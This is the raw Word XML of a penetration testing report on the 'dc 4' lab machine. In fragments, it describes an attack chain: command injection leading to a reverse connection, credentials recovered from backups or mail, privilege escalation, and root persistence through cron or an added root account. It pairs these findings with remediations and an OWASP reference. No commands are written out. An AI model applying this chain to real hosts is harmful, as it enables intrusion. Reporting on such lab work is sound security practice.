          <w:p w14:paraId="71263B61" w14:textId="77777777" w:rsidR="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32DE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A699C0F" w14:textId="448A4794" w:rsidR="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32DE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D32DE">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07E8D621" wp14:editId="68B20A47">
                  <wp:extent cx="4572000" cy="2830195"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="1010767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674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62A28" w14:textId="77777777" w:rsidR="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32DE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="477B7C21" w14:textId="04552C93" w:rsidR="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32D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it on target using command injection passing attribute we will get reverse connection on our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946405">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">note while sending any command we should include Cookie value so we don encounter any error </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F383F34" w14:textId="77777777" w:rsidR="002D32DE" w:rsidRDefault="002D32DE" w:rsidP="002D32DE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="031ECF27" w14:textId="03476B7E" w:rsidR="00946405" w:rsidRDefault="00946405" w:rsidP="002D32DE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094640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5F385C8" wp14:editId="61E9B325">
                  <wp:extent cx="4572000" cy="1121410"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="1142009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0099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C7E30" w14:textId="12954D75" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00A737DC" w:rsidP="00EE71E2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="640B73D9" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFF5D61" w14:textId="4EC2AEAC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lastRenderedPageBreak/>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77BEBE5F" w14:textId="569BB962" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71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attacker obtains remote code execution on the host, allowing arbitrary command execution. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9A39A5" w14:textId="4E881BB4" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71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attacker recovers valid credentials from backup or mail, enabling direct ssh access. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A267F4" w14:textId="73586792" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71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attacker performs local privilege escalation to obtain root privileges. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F7ABC9A" w14:textId="5A8AB20E" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71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full system compromise and persistent root access via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> or added root account.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AE3A9E" w14:textId="77777777" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00A737DC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="2B66D19C" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E7B6ED9" w14:textId="485E4E06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>Remediations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6221ED58" w14:textId="7BC5C05C" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71E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implement strong authentication controls and account lockout for web logins; enforce rate limiting and multi factor where possible. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A9B34F1" w14:textId="62FFF0DC" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71E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validate and sanitize all user supplied input on the tools page; remove unsafe shell execution and follow secure coding practices. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F4AD193" w14:textId="5B47D486" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71E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avoid storing plaintext passwords or backups on the filesystem and secure email contents; rotate exposed credentials immediately. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3456CDF1" w14:textId="06EA082A" w:rsidR="00EE71E2" w:rsidRPr="00EE71E2" w:rsidRDefault="00EE71E2" w:rsidP="00EE71E2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EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">fix </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sudoers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> to grant minimal privileges, remove risky editor </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EE71E2">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> rights, and audit all privileged commands; apply least privilege.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10586D53" w14:textId="77777777" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00A737DC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD1910" w14:paraId="0363F59F" w14:textId="77777777" w:rsidTr="00EE71E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="765CFB0E" w14:textId="0D206DC7" w:rsidR="00A737DC" w:rsidRPr="00A737DC" w:rsidRDefault="00A737DC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A737DC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7470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5213B37F" w14:textId="7964AAA7" w:rsidR="00A737DC" w:rsidRDefault="00EE71E2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="0093261E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://owasp.org/www-community/attacks/Command_Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="681832DB" w14:textId="05B52F1F" w:rsidR="00EE71E2" w:rsidRPr="00A737DC" w:rsidRDefault="00EE71E2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E5CBBFA" w14:textId="77777777" w:rsidR="00F168F1" w:rsidRDefault="00F168F1"/>
    <w:sectPr w:rsidR="00F168F1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57F8" w14:textId="77777777" w:rsidR="006D7DE0" w:rsidRDefault="006D7DE0" w:rsidP="00A737DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7AFE978D" w14:textId="77777777" w:rsidR="006D7DE0" w:rsidRDefault="006D7DE0" w:rsidP="00A73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A737DC" w14:paraId="607B90A4" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2500" w:type="pct"/>
          <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent1"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="30FA47D8" w14:textId="7EAEDD3A" w:rsidR="00A737DC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2D9BF53C52754AE4AAE96629CFB78AF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737DC">
                <w:rPr>
                  <w:caps/>
                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>penetration testing report – dc 4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9B7D94D2171548C7A5A3FCCD0C2DBB2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CA2E6C3" w14:textId="53AC9D56" w:rsidR="00A737DC" w:rsidRDefault="00A737DC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2CEFA90A" w14:textId="77777777" w:rsidR="00A737DC" w:rsidRDefault="00A73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866F" w14:textId="77777777" w:rsidR="006D7DE0" w:rsidRDefault="006D7DE0" w:rsidP="00A737DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7D543780" w14:textId="77777777" w:rsidR="006D7DE0" w:rsidRDefault="006D7DE0" w:rsidP="00A73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955C" w14:textId="3BDCE82D" w:rsidR="00A737DC" w:rsidRDefault="00A737D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4C3E38F" wp14:editId="09FDBD4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B6A7C5" w14:textId="5AE4BA8C" w:rsidR="00A737DC" w:rsidRDefault="00A737D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dc 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4C3E38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B6A7C5" w14:textId="5AE4BA8C" w:rsidR="00A737DC" w:rsidRDefault="00A737D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dc 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1BFC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90F69800"/>
    <w:lvl w:ilvl="0" w:tplc="54606CD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E03C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8302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56357"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9BC69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120E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC1E9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630B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B0E0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699058">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1849295834">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="64646289">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="640690807">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="819155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22"/>
    <w:rsid w:val="0006495D"/>
    <w:rsid w:val="002D32DE"/>
    <w:rsid w:val="003C210B"/>
    <w:rsid w:val="00467F1E"/>
    <w:rsid w:val="006D7DE0"/>
    <w:rsid w:val="007149A5"/>
    <w:rsid w:val="00946405"/>
    <w:rsid w:val="00A1779C"/>
    <w:rsid w:val="00A327B3"/>
    <w:rsid w:val="00A33122"/>
    <w:rsid w:val="00A737DC"/>
    <w:rsid w:val="00B009C5"/>
    <w:rsid w:val="00B01153"/>
    <w:rsid w:val="00D53081"/>
    <w:rsid w:val="00DD1910"/>
    <w:rsid w:val="00EE71E2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CC290"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3D1DBFF0-987B-4BC6-BFB6-C3A8258A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7DC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A73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7DC"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A73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7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hyperlink" Target="https://owasp.org/www-community/attacks/Command_Injec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9BF53C52754AE4AAE96629CFB78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421BA-BBEA-4643-AF54-D10D8704B26F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00837CE8" w:rsidRDefault="0065336B" w:rsidP="0065336B">
          <w:pPr>
            <w:pStyle w:val="2D9BF53C52754AE4AAE96629CFB78AF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B7D94D2171548C7A5A3FCCD0C2DB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C3131-0391-4EB0-B444-9AF4B16D0A14}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00837CE8" w:rsidRDefault="0065336B" w:rsidP="0065336B">
          <w:pPr>
            <w:pStyle w:val="9B7D94D2171548C7A5A3FCCD0C2DBB29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6B"/>
    <w:rsid w:val="0006495D"/>
    <w:rsid w:val="0020060A"/>
    <w:rsid w:val="003C210B"/>
    <w:rsid w:val="005518F6"/>
    <w:rsid w:val="0065336B"/>
    <w:rsid w:val="00837CE8"/>
    <w:rsid w:val="00B01153"/>
    <w:rsid w:val="00B0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9BF53C52754AE4AAE96629CFB78AFE">
    <w:name w:val="2D9BF53C52754AE4AAE96629CFB78AFE"/>
    <w:rsid w:val="0065336B"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="9B7D94D2171548C7A5A3FCCD0C2DBB29">
    <w:name w:val="9B7D94D2171548C7A5A3FCCD0C2DBB29"/>
    <w:rsid w:val="006533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dc 4</vt:lpstr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dc 4</dc:title>
  <dc:subject/>
  <dc:creator>Yash Pawar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yash Pawar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-06T12:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-07T18:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>